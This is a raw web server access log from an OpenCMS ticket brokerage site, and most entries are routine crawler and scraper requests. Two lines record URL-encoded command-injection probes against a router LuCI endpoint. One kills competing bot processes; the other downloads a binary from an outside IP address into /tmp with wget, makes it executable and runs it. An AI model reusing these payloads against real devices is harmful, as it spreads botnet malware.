47.128.38.146 - - [30/Jun/2024:00:07:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.38.146 - - [30/Jun/2024:00:07:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.213.220 - - [30/Jun/2024:00:07:36 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=412FDB60-9870-0CA3-D6DE-428EE343A262&sortorder=asc&column=row HTTP/1.1" 200 87524
135.181.213.220 - - [30/Jun/2024:00:07:40 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=412FDB60-9870-0CA3-D6DE-428EE343A262&sortorder=asc&column=section HTTP/1.1" 200 87524
135.181.213.220 - - [30/Jun/2024:00:07:43 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=416DE971-B897-5140-B141-FE881AD61026&sortorder=desc&column=row HTTP/1.1" 200 89050
114.119.158.193 - - [30/Jun/2024:00:07:43 +0200] "GET /ticket2/opencms/en/sell/?edid=63D01EA9-6118-F064-A9BE-98AD792F8DD1 HTTP/1.1" 302 -
135.181.213.220 - - [30/Jun/2024:00:07:46 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=416DE971-B897-5140-B141-FE881AD61026&sortorder=desc&column=section HTTP/1.1" 200 89050
114.119.158.193 - - [30/Jun/2024:00:07:49 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
135.181.213.220 - - [30/Jun/2024:00:07:49 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=420CC3BB-9C0C-D2F8-9034-6F306315D716&sortorder=asc&column=row HTTP/1.1" 200 88501
135.181.213.220 - - [30/Jun/2024:00:07:53 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=420CC3BB-9C0C-D2F8-9034-6F306315D716&sortorder=asc&column=section HTTP/1.1" 200 88501
94.23.203.202 - - [30/Jun/2024:00:07:54 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=573B7747-EE85-D769-C87D-F3F61FB64AA5 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:07:56 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=425CEE29-53C8-5B74-DDE6-989775A62843 HTTP/1.1" 200 87949
75.119.148.39 - - [30/Jun/2024:00:07:58 +0200] "GET /ticket2/opencms/sv/login/?edid=FA620132-BC4F-5155-0B33-5449E1B23645 HTTP/1.1" 200 74250
47.128.26.87 - - [30/Jun/2024:00:07:59 +0200] "GET /ticket2/opencms/dk/buy/?catid=2E79AED8-FF58-B4E8-AFB0-43E7CEBE7864&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 77201
135.181.213.220 - - [30/Jun/2024:00:07:59 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4283C0F9-68DA-FA30-758C-257225F7159B&sortorder=asc&column=row HTTP/1.1" 200 87773
47.128.26.87 - - [30/Jun/2024:00:08:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.26.87 - - [30/Jun/2024:00:08:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.26.87 - - [30/Jun/2024:00:08:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.26.87 - - [30/Jun/2024:00:08:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.26.87 - - [30/Jun/2024:00:08:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.26.87 - - [30/Jun/2024:00:08:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.26.87 - - [30/Jun/2024:00:08:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.213.220 - - [30/Jun/2024:00:08:02 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=428E58E3-B3C1-2F0F-E2C9-023C8EA16898&sortorder=asc&column=price HTTP/1.1" 200 88814
135.181.213.220 - - [30/Jun/2024:00:08:06 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=428E58E3-B3C1-2F0F-E2C9-023C8EA16898&sortorder=asc&column=row HTTP/1.1" 200 88814
94.23.203.202 - - [30/Jun/2024:00:08:07 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:08:09 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=428E58E3-B3C1-2F0F-E2C9-023C8EA16898&sortorder=asc&column=section HTTP/1.1" 200 88814
83.97.73.245 - - [30/Jun/2024:00:08:09 +0200] "GET /ticket2/opencms/de/actuator/gateway/routes HTTP/1.1" 404 -
47.128.58.173 - - [30/Jun/2024:00:08:11 +0200] "GET /ticket2/opencms/fi/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=6 HTTP/1.1" 200 300507
114.119.135.232 - - [30/Jun/2024:00:08:11 +0200] "GET /ticket2/opencms/en/venue/?venueid=1F8D49CC-7498-4343-28B8-20782AAFFD1F HTTP/1.1" 200 71392
47.128.58.173 - - [30/Jun/2024:00:08:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
135.181.213.220 - - [30/Jun/2024:00:08:12 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4299C753-69F7-9BE0-CB4F-E99ABD6188AD HTTP/1.1" 200 88649
47.128.58.173 - - [30/Jun/2024:00:08:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.58.173 - - [30/Jun/2024:00:08:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.58.173 - - [30/Jun/2024:00:08:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.58.173 - - [30/Jun/2024:00:08:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.58.173 - - [30/Jun/2024:00:08:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.58.173 - - [30/Jun/2024:00:08:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.213.220 - - [30/Jun/2024:00:08:16 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4299C753-69F7-9BE0-CB4F-E99ABD6188AD&sortorder=asc&column=row HTTP/1.1" 200 88685
135.181.213.220 - - [30/Jun/2024:00:08:19 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4299C753-69F7-9BE0-CB4F-E99ABD6188AD&sortorder=asc&column=section HTTP/1.1" 200 88685
135.181.213.220 - - [30/Jun/2024:00:08:22 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4339DD41-EA63-9D26-7344-E8BE74B0C15A&sortorder=asc&column=price HTTP/1.1" 200 88809
94.23.203.202 - - [30/Jun/2024:00:08:23 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=64756941-02D2-3538-2077-8C2508F4A3A8 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:08:26 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4339DD41-EA63-9D26-7344-E8BE74B0C15A&sortorder=asc&column=row HTTP/1.1" 200 88809
135.181.213.220 - - [30/Jun/2024:00:08:29 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4339DD41-EA63-9D26-7344-E8BE74B0C15A&sortorder=asc&column=section HTTP/1.1" 200 88809
47.128.17.174 - - [30/Jun/2024:00:08:30 +0200] "GET /ticket2/opencms/fi/buy/?catid=55D1256D-BDD9-CBA3-47A3-0A252F702555&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&page=7 HTTP/1.1" 200 78396
47.128.17.174 - - [30/Jun/2024:00:08:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.17.174 - - [30/Jun/2024:00:08:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.17.174 - - [30/Jun/2024:00:08:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.17.174 - - [30/Jun/2024:00:08:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
52.167.144.195 - - [30/Jun/2024:00:08:32 +0200] "GET /ticket2/opencms/no/about/press HTTP/1.1" 200 73909
47.128.17.174 - - [30/Jun/2024:00:08:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.17.174 - - [30/Jun/2024:00:08:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.17.174 - - [30/Jun/2024:00:08:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
135.181.213.220 - - [30/Jun/2024:00:08:32 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4339DD41-EA63-9D26-7344-E8BE74B0C15A&sortorder=desc&column=row HTTP/1.1" 200 88808
135.181.213.220 - - [30/Jun/2024:00:08:36 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=43667867-3935-092D-B992-38E905DC29DA&sortorder=asc&column=section HTTP/1.1" 200 87767
94.23.203.202 - - [30/Jun/2024:00:08:38 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=6BD6E0B0-84AF-3A0D-3851-C1357CE9B771 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:08:39 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=43F97FC3-DD1B-BB64-23DC-A40478F1B0B5&sortorder=desc&column=price HTTP/1.1" 200 88832
66.249.66.69 - - [30/Jun/2024:00:08:40 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/premier-league/tottenham/ HTTP/1.1" 200 85881
66.249.66.83 - - [30/Jun/2024:00:08:41 +0200] "GET /ticket2/opencms/en/venue/?venueid=BBEC82D1-C9A9-40E1-98A5-6357ECE4EFA5 HTTP/1.1" 200 71357
135.181.213.220 - - [30/Jun/2024:00:08:42 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4453C14F-FA3F-6A89-FB6F-D0C9D2CCD928&sortorder=asc&column=price HTTP/1.1" 200 85982
141.98.83.197 - - [30/Jun/2024:00:08:44 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560for+proc_dir+in+%252Fproc%252F%255B0-9%255D%252A%253B+do+pid%253D%2524%257Bproc_dir%2523%2523%252A%252F%257D%253B+buffer%253D%2524%2528cat+%2522%252Fproc%252F%2524pid%252Fmaps%2522%2529%253B+if+%255B+%2522%2524%257B%2523buffer%257D%2522+-gt+1+%255D%253B+then+if+%255B+%2522%2524%257Bbuffer%2523%252A%2522%252Flib%252F%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D+%2526%2526+%255B+%2522%2524%257Bbuffer%2523%252A%2522telnetdbot%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D%253B+then+kill+-9+%2522%2524pid%2522%253B+fi%253B+fi%253B+done%2560) HTTP/1.1" 404 -
141.98.83.197 - - [30/Jun/2024:00:08:45 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560cd+%252Ftmp%253B+rm+-rf+shk%253B+wget+http%253A%252F%252F45.148.10.78%252Fshk%253B+chmod+777+shk%253B+.%252Fshk+tplink%253B+rm+-rf+shk%2560) HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:08:46 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4453C14F-FA3F-6A89-FB6F-D0C9D2CCD928&sortorder=asc&column=row HTTP/1.1" 200 85982
135.181.213.220 - - [30/Jun/2024:00:08:49 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4453C14F-FA3F-6A89-FB6F-D0C9D2CCD928&sortorder=desc&column=section HTTP/1.1" 200 85981
135.181.213.220 - - [30/Jun/2024:00:08:52 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4495F46E-D813-768C-E663-875914F2AAA2&sortorder=asc&column=price HTTP/1.1" 200 87568
94.23.203.202 - - [30/Jun/2024:00:08:53 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=6E0E0CA4-3F14-9697-92B9-3687047BE453 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:08:55 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4495F46E-D813-768C-E663-875914F2AAA2&sortorder=asc&column=row HTTP/1.1" 200 87568
135.181.213.220 - - [30/Jun/2024:00:08:59 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4495F46E-D813-768C-E663-875914F2AAA2&sortorder=asc&column=section HTTP/1.1" 200 87568
135.181.213.220 - - [30/Jun/2024:00:09:02 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4495F46E-D813-768C-E663-875914F2AAA2&sortorder=desc&column=price HTTP/1.1" 200 87567
135.181.213.220 - - [30/Jun/2024:00:09:05 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4495F46E-D813-768C-E663-875914F2AAA2&sortorder=desc&column=row HTTP/1.1" 200 87567
94.23.203.202 - - [30/Jun/2024:00:09:06 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=70B37487-FE30-D476-CAE7-E6AFEA3153F2 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:09:09 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4495F46E-D813-768C-E663-875914F2AAA2&sortorder=desc&column=section HTTP/1.1" 200 87567
135.181.213.220 - - [30/Jun/2024:00:09:12 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=44FFBFC9-1B8A-5A9D-1686-BF1700915FD9&sortorder=desc&column=price HTTP/1.1" 200 87578
135.181.213.220 - - [30/Jun/2024:00:09:15 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=457A4AFF-A6EF-C071-9DEF-1F13C05D6B21&sortorder=desc&column=row HTTP/1.1" 200 89270
185.191.171.7 - - [30/Jun/2024:00:09:18 +0200] "GET /ticket2/opencms/fi/urheilu/jalkapallo/ligue_1/lille/ HTTP/1.1" 200 73491
135.181.213.220 - - [30/Jun/2024:00:09:19 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=457A4AFF-A6EF-C071-9DEF-1F13C05D6B21&sortorder=desc&column=section HTTP/1.1" 200 89270
94.23.203.202 - - [30/Jun/2024:00:09:22 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=739BFC5D-78FA-6834-D764-6CE64CA5F9EC HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:09:22 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=45CC6BB1-4A0B-C243-C5EE-01457B55C324&sortorder=asc&column=row HTTP/1.1" 200 87986
47.128.49.89 - - [30/Jun/2024:00:09:22 +0200] "GET /ticket2/opencms/no/buy/?catid=1656E964-1E02-9A38-D092-65384E60B6EA&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&page=7 HTTP/1.1" 200 78020
47.128.49.89 - - [30/Jun/2024:00:09:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
47.128.49.89 - - [30/Jun/2024:00:09:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
47.128.49.89 - - [30/Jun/2024:00:09:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
47.128.49.89 - - [30/Jun/2024:00:09:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.49.89 - - [30/Jun/2024:00:09:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.49.89 - - [30/Jun/2024:00:09:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
114.119.155.23 - - [30/Jun/2024:00:09:25 +0200] "GET /ticket2/opencms/en/sell/?edid=EFDB06D7-2C74-FECB-EDDF-C256DF642DF7 HTTP/1.1" 302 -
135.181.213.220 - - [30/Jun/2024:00:09:25 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=45CC6BB1-4A0B-C243-C5EE-01457B55C324&sortorder=asc&column=section HTTP/1.1" 200 87986
47.128.49.89 - - [30/Jun/2024:00:09:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.49.89 - - [30/Jun/2024:00:09:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.49.89 - - [30/Jun/2024:00:09:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.49.89 - - [30/Jun/2024:00:09:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.213.220 - - [30/Jun/2024:00:09:29 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=45CC6BB1-4A0B-C243-C5EE-01457B55C324&sortorder=desc&column=price HTTP/1.1" 200 87985
114.119.155.23 - - [30/Jun/2024:00:09:29 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
135.181.213.220 - - [30/Jun/2024:00:09:32 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=45CC6BB1-4A0B-C243-C5EE-01457B55C324&sortorder=desc&column=row HTTP/1.1" 200 87985
135.181.213.220 - - [30/Jun/2024:00:09:35 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=45CC6BB1-4A0B-C243-C5EE-01457B55C324&sortorder=desc&column=section HTTP/1.1" 200 87985
135.181.213.220 - - [30/Jun/2024:00:09:39 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=46484497-40E3-24DA-1A4A-CD115F7A9621&sortorder=asc&column=price HTTP/1.1" 200 88150
52.167.144.195 - - [30/Jun/2024:00:09:39 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=7DAE74E8-C4A2-8C27-1B6F-A1C7846A527A HTTP/1.1" 200 87553
94.23.203.202 - - [30/Jun/2024:00:09:40 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7ACC33AD-EE7E-AAA7-9050-0F4587759B87 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:09:42 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=46484497-40E3-24DA-1A4A-CD115F7A9621&sortorder=asc&column=row HTTP/1.1" 200 88150
66.249.76.194 - - [30/Jun/2024:00:09:42 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=6312D7C5-4BBF-A97E-B93A-47328366BE18 HTTP/1.1" 200 110748
66.249.66.64 - - [30/Jun/2024:00:09:44 +0200] "GET /ticket2/opencms/dk/venue/?venueid=4D17CC3A-BD8B-68E3-235C-47D5A4795C72 HTTP/1.1" 200 71851
66.249.66.44 - - [30/Jun/2024:00:09:45 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=55071255-F1B1-83D4-CE10-06DA54270E48 HTTP/1.1" 200 85746
135.181.213.220 - - [30/Jun/2024:00:09:45 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=46484497-40E3-24DA-1A4A-CD115F7A9621&sortorder=asc&column=section HTTP/1.1" 200 88150
135.181.213.220 - - [30/Jun/2024:00:09:49 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=47258BBF-9D72-136F-FE2D-6B67ED68E2F4&sortorder=asc&column=price HTTP/1.1" 200 87577
135.181.213.220 - - [30/Jun/2024:00:09:52 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=47258BBF-9D72-136F-FE2D-6B67ED68E2F4&sortorder=asc&column=row HTTP/1.1" 200 87577
135.181.213.220 - - [30/Jun/2024:00:09:55 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=47258BBF-9D72-136F-FE2D-6B67ED68E2F4&sortorder=asc&column=section HTTP/1.1" 200 87577
94.23.203.202 - - [30/Jun/2024:00:09:55 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7BADFFFB-57C5-5DBC-E7EB-B45075B3D8F9 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:09:58 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=47258BBF-9D72-136F-FE2D-6B67ED68E2F4&sortorder=desc&column=row HTTP/1.1" 200 87576
135.181.213.220 - - [30/Jun/2024:00:10:01 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=47258BBF-9D72-136F-FE2D-6B67ED68E2F4&sortorder=desc&column=section HTTP/1.1" 200 87576
135.181.213.220 - - [30/Jun/2024:00:10:05 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4736DF7C-C1C2-2C08-48FA-1D2EB109FC30&sortorder=asc&column=price HTTP/1.1" 200 87592
130.255.166.98 - - [30/Jun/2024:00:10:06 +0200] "GET /ticket2/opencms/es/robots.txt HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:10:08 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4736DF7C-C1C2-2C08-48FA-1D2EB109FC30&sortorder=asc&column=row HTTP/1.1" 200 87592
66.249.92.132 - - [30/Jun/2024:00:10:09 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/bundesliga/ HTTP/1.1" 200 77418
130.255.166.142 - - [30/Jun/2024:00:10:09 +0200] "GET /ticket2/opencms/es/ HTTP/1.1" 200 93065
135.181.213.220 - - [30/Jun/2024:00:10:11 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4736DF7C-C1C2-2C08-48FA-1D2EB109FC30&sortorder=asc&column=section HTTP/1.1" 200 87592
85.208.96.211 - - [30/Jun/2024:00:10:13 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/premier-league/nottingham/ HTTP/1.1" 200 84366
94.23.203.202 - - [30/Jun/2024:00:10:14 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7CF2D645-F785-0CBB-1B7C-C4711617EAAD HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:10:15 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4738F2B2-CBDF-F2F0-1A34-B98DF1D7DCCB&sortorder=asc&column=price HTTP/1.1" 200 88382
47.128.54.0 - - [30/Jun/2024:00:10:15 +0200] "GET /ticket2/opencms/no/buy/?catid=64756941-02D2-3538-2077-8C2508F4A3A8&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=7 HTTP/1.1" 200 83090
47.128.54.0 - - [30/Jun/2024:00:10:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.54.0 - - [30/Jun/2024:00:10:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.54.0 - - [30/Jun/2024:00:10:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.54.0 - - [30/Jun/2024:00:10:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.54.0 - - [30/Jun/2024:00:10:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.54.0 - - [30/Jun/2024:00:10:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.54.0 - - [30/Jun/2024:00:10:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.213.220 - - [30/Jun/2024:00:10:18 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4738F2B2-CBDF-F2F0-1A34-B98DF1D7DCCB&sortorder=asc&column=row HTTP/1.1" 200 88382
135.181.213.220 - - [30/Jun/2024:00:10:22 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4738F2B2-CBDF-F2F0-1A34-B98DF1D7DCCB&sortorder=asc&column=section HTTP/1.1" 200 88382
135.181.213.220 - - [30/Jun/2024:00:10:25 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4767511A-7A13-FE82-852A-E42C79A7D688&sortorder=asc&column=price HTTP/1.1" 200 88190
135.181.213.220 - - [30/Jun/2024:00:10:28 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4767511A-7A13-FE82-852A-E42C79A7D688&sortorder=asc&column=row HTTP/1.1" 200 88190
94.23.203.202 - - [30/Jun/2024:00:10:30 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:10:32 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4767511A-7A13-FE82-852A-E42C79A7D688&sortorder=asc&column=section HTTP/1.1" 200 88190
135.181.213.220 - - [30/Jun/2024:00:10:35 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F10F0FD-0073-B564-973B-CB2F36E999C3&sortorder=desc&column=price HTTP/1.1" 200 89139
135.181.213.220 - - [30/Jun/2024:00:10:39 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F10F0FD-0073-B564-973B-CB2F36E999C3&sortorder=desc&column=row HTTP/1.1" 200 89139
135.181.213.220 - - [30/Jun/2024:00:10:42 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F10F0FD-0073-B564-973B-CB2F36E999C3&sortorder=desc&column=section HTTP/1.1" 200 89139
135.181.213.220 - - [30/Jun/2024:00:10:45 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F1601FE-364B-5738-B6A1-896D7AAC5D9B&sortorder=desc&column=price HTTP/1.1" 200 87753
94.23.203.202 - - [30/Jun/2024:00:10:45 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B HTTP/1.1" 404 -
